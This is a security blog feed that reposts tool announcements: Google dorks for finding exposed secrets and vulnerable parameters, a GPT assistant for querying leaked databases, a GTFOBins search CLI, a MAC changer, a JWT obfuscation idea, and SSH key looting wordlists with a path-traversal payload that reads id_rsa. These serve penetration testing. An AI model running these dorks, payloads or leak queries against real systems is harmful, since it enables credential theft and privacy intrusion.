tag:blogger.com,1999:blog-47595134396886655442024-03-18T09:35:29.018-07:00Hacking ReviewsLeading source of Hacking News, Information Security, Cyber Security, and Network Security.Unknownnoreply@blogger.comBlogger12394125tag:blogger.com,1999:blog-4759513439688665544.post-71288227780689813412024-03-18T09:34:00.001-07:002024-03-18T09:34:57.388-07:00Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting<div class="post-body entry-content" id="post-body-4744913423381446643" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv" rel="nofollow"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640"/></a></p><p><br/></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <span><a name='more'></a></span><p><br/></p> <p><a href="https://twitter.com/TakSec" rel="nofollow" target="_blank" title="A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting (3)"></a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" rel="nofollow" target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> <p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" rel="nofollow" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> <h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr/> <p>Medium articles for more dorks:</p> <p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> <p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/google-dorks-bug-bounty-list-of-google.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-47078705302533654932024-03-17T09:40:00.001-07:002024-03-17T09:40:59.430-07:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<div class="post-body entry-content" id="post-body-740203000077868011" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv" rel="nofollow"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" width="640"/></a></p><p style="text-align: center;"><br/></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" rel="nofollow" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" rel="nofollow" target="_blank" title="leaked">leaked</a> databases. This guide will help you set up and run the project on your local environment.</p><span><a name='more'></a></span><p><br/></p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong></li> </ol> <p>First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:</p> <p>git clone https://github.com/luijait/DarkGPT.git cd DarkGPT</p> <ol> <li><strong>Configure Environment Variables</strong></li> </ol> <p>You will need to set up some environment variables for the script to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code>:</p> <p>DEHASHED_API_KEY="your_dehashed_api_key_here"</p> <ol> <li><strong>Install Dependencies</strong></li> </ol> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <p>pip install -r requirements.txt 4. Then Run the project: python3 main.py</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/darkgpt-osint-assistant-based-on-gpt-4.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-14693257270527323042024-03-16T11:20:00.001-07:002024-03-16T11:20:31.821-07:00Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems<div class="post-body entry-content" id="post-body-3536309726077760032" itemprop="articleBody"> <div style="margin:15px"> </div> <h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ" rel="nofollow"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640"/></a></h2><p><br/></p> <p><code>GTFOcli</code> it's a <a href="https://www.kitploit.com/search/label/Command%20Line" rel="nofollow" target="_blank" title="Command Line">Command Line</a> Interface for easy binaries search commands that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" rel="nofollow" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br/></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest</code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tapbrew install gtfocli</code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli</code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" rel="nofollow" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar</code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search</code></pre> <p>Search for binaries located into file;</p> <pre><code>cat myBinaryList.txt/bin/bash/bin/shtararp/bin/tailgtfocli search -f myBinaryList.txt</code></pre> <h3>Search for windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows</code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows</code></pre> <p>Search for binaries located into file:</p> <pre><code>cat windowsExecutableList.txtWingetc:\\Users\\Desktop\\SshStordiagBashc:\\Users\\Runonce.exeCmdkeyc:\dir\subDir\Users\Certreq.exegtfocli search -f windowsExecutableList.txt --os windows</code></pre> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows</code></pre> <h3>Search using dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows</code></pre> <p>Search for binary <code>tar</code> and print output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json</code></pre> <p>Search for binaries located into file mounted as volume in the container:</p> <pre><code>cat myBinaryList.txt/bin/bash/bin/shtararp/bin/taildocker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt</code></pre> <h2>CTF</h2> <p>An example of common use case for <code>gtfocli</code> is together with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null</code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search</code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>, without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/gtfocli-gtfo-command-line-interface-for.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-39975778365286933382024-03-15T08:59:00.001-07:002024-03-15T08:59:01.800-07:00n0Mac - Yet Another Mac Changer!!!<div class="post-body entry-content" id="post-body-1685240469171419301" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640"/></a></div><p><br/></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" rel="nofollow" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br/></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br/><span style="font-size: large;"><b>Installation</b></span><br/> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/n0mac-yet-another-mac-changer.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-10211525711867771482024-03-13T02:14:00.001-07:002024-03-13T02:14:07.376-07:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<div class="post-body entry-content" id="post-body-3612925756192902677" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y" rel="nofollow"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640"/></a></p><div><br/></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br/> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" rel="nofollow" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a name='more'></a></span><div><br/></div> <br/><span style="font-size: large;"><b>What is a JWT Token?</b></span><br/> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.</p> <p>What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" rel="nofollow" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" rel="nofollow" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is to utilize them as <a href="https://www.kitploit.com/search/label/Access%20Tokens" rel="nofollow" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.</p> <br/><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br/> <p>This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.</p> <br/><span style="font-size: large;"><b>userid</b></span><br/> <ul> <li>The code snippet targets the key named "userid" stored in the payload section as an example.</li> <li>The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).</li> </ul> <p>The idea behind attempting to obscure the value of the key named "userid" is as follows:</p> <br/><b>Encryption:</b><br/> <ul> <li>The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.</li> <li>XOR operation is performed using a symmetric key.</li> <li>The resulting value is then encoded using Base64.</li> </ul> <br/><b>Decryption:</b><br/> <ul> <li>Encrypted data is decoded using Base64.</li> <li>Decryption is performed by XOR operation with the symmetric key.</li> <li>The original user ID and hashed timestamp are revealed in plaintext.</li> <li>The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.</li> </ul> <br/><b>Symmetric Key for XOR Encoding:</b><br/> <ul> <li>Various materials can be utilized for this key.</li> <li>It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>However, this key should be securely stored in the <a href="https://www.kitploit.com/search/label/Database%20Management" rel="nofollow" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>and..^^</p> <pre><code>in the example, the key is shown as { 'userid': 'random_value' },making it apparent that it represents a user ID.However, this is merely for illustrative purposes.In practice, a predetermined and undisclosed name is typically used.For example, 'a': 'changing_random_value'</code></pre> <br/><span style="font-size: large;"><b>Notes</b></span><br/> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure. </li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br/><span style="font-size: x-large;"><b>And...</b></span><br/> <ul> <li>If you find this helpful, please the <strong>"star"</strong>:star2: to support further improvements.</li> </ul> <br/><span style="font-size: x-large;"><b>preview</b></span><br/> <pre><code># python3 main.py- Current Unix Timestamp: 1709160368- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08- userid: 23243232- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'- JWT Secret key: yes_your_service_jwt_secret_key- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}# run again- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}</code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y" rel="nofollow"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640"/></a></p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/some-tweak-to-hide-jwt-payload-values.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-5620917839251593922024-03-13T02:08:00.001-07:002024-03-13T02:08:14.710-07:00SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names<div class="post-body entry-content" id="post-body-7388838676793839543" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640"/></a></div><p><br/></p><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br/> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa?file=../../../../../../../../home/user/.ssh/id_rsa-cert</code></pre> <br/><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" rel="nofollow" target="_blank" title="Wordlists">Wordlists</a> đŸ”’đŸ—️</b></span><br/> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br/><span style="font-size: large;"><b>Wordlist Files đŸ“</b></span><br/> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br/><span style="font-size: large;"><b>Usage đŸš€</b></span><br/> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" rel="nofollow" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" rel="nofollow" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br/><span style="font-size: large;"><b>Acknowledgements đŸ™</b></span><br/> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" rel="nofollow" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" rel="nofollow" target="_blank" title="Hacking">Hacking</a> Trick." </p> <br/><span style="font-size: large;"><b>Disclaimer ⚠️</b></span><br/> <p>Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.</p><br/><br/><div style="text-align: 